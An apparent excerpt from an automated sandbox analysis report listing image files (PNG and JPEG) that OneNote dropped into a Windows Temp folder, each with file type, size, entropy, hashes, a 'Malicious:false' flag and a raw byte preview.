                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                  C:\Users\user\AppData\Local\Temp\{7438AE1A-53FC-430E-A4CF-348EC0608115}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{760BAC70-5C23-4594-BEE1-11B6CFFEC9E3}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3879
                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                  C:\Users\user\AppData\Local\Temp\{77D4F67D-BEE3-4A09-8BE6-AC0BC40D7459}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):52945
                                                                                                  Entropy (8bit):7.6490972666456765
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
                                                                                                  MD5:AD003F032F32FAC4672D4CE237FA5C5B
                                                                                                  SHA1:AE234931B452F0D649D91291763B919CF350EA49
                                                                                                  SHA-256:ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
                                                                                                  SHA-512:ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k|...S..d.4.>.RW5z.$.i.)V.O....>o...c..*&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N*..|.4...80.#..e....t.J..ZQ.x|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

                                                                                                  C:\Users\user\AppData\Local\Temp\{78722B2C-3230-4EE4-86F0-5316E802283C}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4190
                                                                                                  Entropy (8bit):7.94161730428269
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                  MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                  SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                  SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                  SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                  C:\Users\user\AppData\Local\Temp\{7983701E-82F5-4F5F-9043-ED3FD1A3ECA2}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):4181
                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                  C:\Users\user\AppData\Local\Temp\{79ACD8B9-52CA-4E36-9988-A54D782627F9}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Temp\{7A625EB0-34AF-43B4-9C8B-B481B846CEB1}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):53259
                                                                                                  Entropy (8bit):7.651662052139301
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                  MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                  SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                  SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                  SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

                                                                                                  C:\Users\user\AppData\Local\Temp\{7BA1A306-C64F-4720-BC53-6148DACA5303}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                  C:\Users\user\AppData\Local\Temp\{7BDD990F-4599-46B4-9E54-A49F7161D6F6}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 69x630, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11040
                                                                                                  Entropy (8bit):7.929583162638891
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:u99+91V42ho91V42ho91V42ho91V4235z9pUkDCyixxo4PS6b8tEy3BcWWhhSy0b:ubKD4/D4/D4/D4uzX38u4PNYJ2zhhmb
                                                                                                  MD5:02775A1E41CF53AC771D820003903913
                                                                                                  SHA1:2951A94A05ECF65E86D44C3C663B9B44BAD2BC9D
                                                                                                  SHA-256:83245F217DEAE4A4143B565E13C045DBB32A9063E8C6B2E43BB15CD76C5F9219
                                                                                                  SHA-512:5A1FCC24BDD5EE16BC2C9BACF45BCECF35ED895EAC22D2C4EE99C1B7E79C8E8B9E5186E3D026BA08FF70E08113F0A88FBF5E61C57AF4F3EA9BA80CE9F33410E9
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H.....C....................................................................C.......................................................................v.E.............................................S..........................Aa..!12Qqw.....3568rv........".....4Btu.....#Rs.(W..bg.................................D.....................1..2.!4Aqrs....Qa......t..."3BRb....#.$S.Cc..............?...K/h._+.N6.-.a...5...;.r....,...0B.s(..zp..4.%r|q..E.Q^.../...C.R..?u.q8XN.>.e..:..gJ...._.n>.70G,..(........3b.&.5m...Q../...7Ie..k....e.l6..&..`Gt.P.Y^r...=..Y.e...N.B...O.#..J+........u.V;G.'.....V.]8..C.]..........E.....c..w&lX..f..\T.J?...F.,..m|..93........,.....+.R..WG...%.....(@.....p].iEz<.8.^...J.h.....a8P.1......(z..y~.........H.Z^.>..<.....L.k..IG...R.(.%..m....&u...B|.....@]ey.W.J...!d..R.8...[..>8....(.G......!.)X.....,'..F2.Z.t..Aw./..Z..#..i.kK.......b.i...qR.(....RE.............O.XP.#..(...9J..]...,.2.[w....KrW'...tY.......{~.:.+..

                                                                                                  C:\Users\user\AppData\Local\Temp\{7C496750-2D20-4642-A338-11BB712FD4C5}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2599
                                                                                                  Entropy (8bit):7.903700862190034
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                  MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                  SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                  SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                  SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                  C:\Users\user\AppData\Local\Temp\{7CBC4BFA-0A29-4677-82D2-2B78CD0CC4AE}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):79656
                                                                                                  Entropy (8bit):7.966459570826366
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
                                                                                                  MD5:39FF3ACAE544EAC172B1269F825B9E9F
                                                                                                  SHA1:2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
                                                                                                  SHA-256:70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
                                                                                                  SHA-512:3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\.*.N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........|..4.wJ*..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

                                                                                                  C:\Users\user\AppData\Local\Temp\{7CE0CD0C-C2ED-4F86-A004-23950989A4E1}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2232
                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                  C:\Users\user\AppData\Local\Temp\{7DD1E378-A9E0-4788-80FE-D49CFF8CC729}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
